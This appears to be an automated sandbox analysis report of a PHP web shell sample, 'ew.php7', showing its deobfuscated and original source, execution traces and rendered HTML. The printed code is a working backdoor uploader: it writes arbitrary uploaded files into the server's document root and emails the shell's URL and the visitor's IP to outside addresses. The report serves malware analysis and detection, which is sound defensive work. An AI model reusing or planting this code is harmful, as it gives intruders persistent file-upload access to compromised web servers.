PHP Malware Analysis

ew.php7

md5: edc261694aca27b0500fbaef9089bb22

Jump to:

Screenshot


Attributes

Emails

Environment

Files

Input

Title

URLs
  • http://localhost/uploads/ew.php7 (Traces)


Deobfuscated PHP code

//Powered By REPUBLIK INDONESIA//
//Team : MBOJO INTERNAL BLACKHAT //
<title>xSCP-4999 - MBOJO INTERNAL BLACKHAT </title><center>
<body bgcolor="black">
    <br><br><br><br>
    <br>
    <font color="lime" size="5">> xSCP-4999 <</font>
<font color="red"></center><br><br>
    <center>
<?php 
echo "MBOJO INTERNAL BLACKHAT - Home Root Uploader<br>";
echo "<b>" . php_uname() . "</b><br>";
echo "<form method='post' enctype='multipart/form-data'>\r\n      <input type='file' name='idx_file'>\r\n      <input type='submit' name='upload' value='Upload'>\r\n      </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root . '/' . $files;
if (isset($_POST['upload'])) {
    if (is_writable($root)) {
        if (@copy($_FILES['idx_file']['tmp_name'], $dest)) {
            $web = "http://" . $_SERVER['HTTP_HOST'] . "/";
            echo "Sukses Cok! -> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
        } else {
            echo "Gagal Upload Di Document Root.";
        }
    } else {
        if (@copy($_FILES['idx_file']['tmp_name'], $files)) {
            echo "Sukses Upload <b>{$files}</b> Di Folder Ini";
        } else {
            echo "Gagal mek!";
        }
    }
}
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = '[email protected], [email protected]';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");

Execution traces

data/traces/edc261694aca27b0500fbaef9089bb22_trace-1676240489.0875.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:21:54.985357]
1	0	1	0.000149	393512
1	3	0	0.000246	406232	{main}	1		/var/www/html/uploads/ew.php7	0	0
2	4	0	0.000264	406232	php_uname	0		/var/www/html/uploads/ew.php7	12	0
2	4	1	0.000279	406344
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/ew.php7	17	$root = '/var/www/html'
1		A						/var/www/html/uploads/ew.php7	18	$files = NULL
1		A						/var/www/html/uploads/ew.php7	19	$dest = '/var/www/html/'
2	5	0	0.000360	406272	ini_set	0		/var/www/html/uploads/ew.php7	38	2	'output_buffering'	0
2	5	1	0.000376	406344
2	5	R			FALSE
2	6	0	0.000390	406272	ini_set	0		/var/www/html/uploads/ew.php7	39	2	'display_errors'	0
2	6	1	0.000404	406344
2	6	R			''
2	7	0	0.000416	406272	set_time_limit	0		/var/www/html/uploads/ew.php7	40	1	0
2	7	1	0.000431	406336
2	7	R			FALSE
2	8	0	0.000443	406304	ini_set	0		/var/www/html/uploads/ew.php7	41	2	'memory_limit'	'64M'
2	8	1	0.000457	406408
2	8	R			'128M'
2	9	0	0.000470	406304	header	0		/var/www/html/uploads/ew.php7	42	1	'Content-Type: text/html; charset=UTF-8'
2	9	1	0.000490	406480
2	9	R			NULL
1		A						/var/www/html/uploads/ew.php7	43	$tujuanmail = '[email protected], [email protected]'
1		A						/var/www/html/uploads/ew.php7	44	$x_path = 'http://localhost/uploads/ew.php7'
1		A						/var/www/html/uploads/ew.php7	45	$pesan_alert = 'fix http://localhost/uploads/ew.php7 :p *IP Address : [ 127.0.0.1 ]'
2	10	0	0.000541	406648	mail	0		/var/www/html/uploads/ew.php7	46	4	'[email protected], [email protected]'	'LOGGER'	'fix http://localhost/uploads/ew.php7 :p *IP Address : [ 127.0.0.1 ]'	'[ 127.0.0.1 ]'
2	10	1	0.001375	406792
2	10	R			FALSE
1	3	1	0.001396	406608
			0.001424	314696
TRACE END   [2023-02-12 20:21:54.986661]


Generated HTML code

<html><head></head><body bgcolor="black">//Powered By REPUBLIK INDONESIA//
//Team : MBOJO INTERNAL BLACKHAT //
<title>xSCP-4999 - MBOJO INTERNAL BLACKHAT </title><center>

    <br><br><br><br>
    <br>
    <font color="lime" size="5">&gt; xSCP-4999 &lt;</font>
<font color="red"></font></center><font color="red"><br><br>
    <center>
MBOJO INTERNAL BLACKHAT - Home Root Uploader<br><b>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</b><br><form method="post" enctype="multipart/form-data">
      <input type="file" name="idx_file">
      <input type="submit" name="upload" value="Upload">
      </form></center></font></body></html>

Original PHP code

//Powered By REPUBLIK INDONESIA//
//Team : MBOJO INTERNAL BLACKHAT //
<title>xSCP-4999 - MBOJO INTERNAL BLACKHAT </title><center>
<body bgcolor="black">
    <br><br><br><br>
    <br>
    <font color="lime" size="5">> xSCP-4999 <</font>
<font color="red"></center><br><br>
    <center>
<?php
echo "MBOJO INTERNAL BLACKHAT - Home Root Uploader<br>";
echo "<b>".php_uname()."</b><br>";
echo "<form method='post' enctype='multipart/form-data'>
      <input type='file' name='idx_file'>
      <input type='submit' name='upload' value='Upload'>
      </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
    if(is_writable($root)) {
        if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
            $web = "http://".$_SERVER['HTTP_HOST']."/";
            echo "Sukses Cok! -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
        } else {
            echo "Gagal Upload Di Document Root.";
        }
    } else {
        if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
            echo "Sukses Upload <b>$files</b> Di Folder Ini";
        } else {
            echo "Gagal mek!";
        }
    }
}
?>
<?php
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = '[email protected], [email protected]';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
?>